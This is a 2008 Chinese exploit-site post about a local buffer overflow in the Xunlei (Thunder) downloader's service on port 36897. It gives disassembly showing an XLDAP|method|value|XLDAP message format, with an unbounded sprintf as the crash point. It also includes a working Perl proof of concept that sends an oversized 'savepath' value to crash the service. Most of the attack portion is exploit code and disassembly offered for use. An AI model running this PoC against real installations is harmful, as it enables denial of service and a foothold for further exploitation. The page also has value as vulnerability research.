首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
迅雷本地溢出POC
来源:B.C.T 作者:疯狗 发布时间:2008-05-07  

By:疯狗[B.C.T]

以前一直在传迅雷还有0day,Activex的应该差不多了,但是也不敢怠慢,还是卸载之,今天丰初发来一URL,原来素一迅雷0day,看说明还是远程!感觉装了一个,看那个漏洞监听的端口
C:\>netstat -na|find "36897"
TCP 127.0.0.1:36897 0.0.0.0:0 LISTENING

绑定的本地IP啊?!那就说明这个是不可以远程的,只能本地了。
......
23132CBE 68 B4C61323 push 2313C6B4 ; ASCII "savepath"
23132CC3 57 push edi
23132CC4 FFD6 call esi
23132CC6 59 pop ecx
23132CC7 84C0 test al, al

......

23132CEF 85FF test edi, edi
23132CF1 74 02 je short 23132CF5
23132CF3 8BCF mov ecx, edi
23132CF5 B8 D4C61323 mov eax, 2313C6D4 ; ASCII "XLDAP"
23132CFA 50 push eax
23132CFB 52 push edx
23132CFC 51 push ecx
23132CFD 50 push eax
23132CFE 8D85 5CFEFFFF lea eax, dword ptr [ebp-1A4]
23132D04 68 C0C61323 push 2313C6C0 ; ASCII "%s|%s|%s|%s"
......

根据上面可以分析出来这个端口接受数据的格式是XLDAP|A|B|XLDAP,A是方法,B是值。又偷懒看了下介绍,问题出在savepath方法上,那么构造数据就很简单了,POC如下:

 #!/usr/bin/perl
use IO::Socket;

if ($socket = IO::Socket::INET->new(PeerAddr => "127.0.0.1",PeerPort => "36897",Proto => "TCP"))
{
$exploit = "XLDAP|savepath|".
# ("A" x 397).
 ("A" x 500).
 "|XLDAP";

 print $socket $exploit;
 sleep(1);
 close($socket);
}
else
{
 print "Cannot connect to localhost:36897 port\n";
}

如果用python写exp的话你会很郁闷,因为py总是会给偶多出一个换行,就算使用[:-1]这种方法也没用,郁闷,目前不清楚是传递的过程还是print的时候,谁知道是什么原因?
23132D09 50 push eax
23132D0A FF15 54E51323 call dword ptr [<&MSVCRT.sprintf>] ; crash
23132D10 8D85 5CFEFFFF lea eax, dword ptr [ebp-1A4]
就是在执行这步sprintf函数复制的时候导致crash。


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Galleristic 1.0 (index.php cat
·DeluxeBB <= 1.2 Multiple Remot
·OneCMS 2.5 Remote Blind SQL In
·Scout Portal Toolkit <= 1.4.0
·rdesktop 1.5.0 iso_recv_msg()
·联众世界的游戏大厅主程序GLWorl
·RunCMS <= 1.6.1 (msg_image) SQ
·HLDS WebMod 0.48 (rconpass) R
·TFTP Server for Windows 1.4 ST
·Microsoft Works 7 WkImgSrv.dll
·vShare Youtube Clone 2.6 (tid)
·Joomla Component Webhosting (c
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved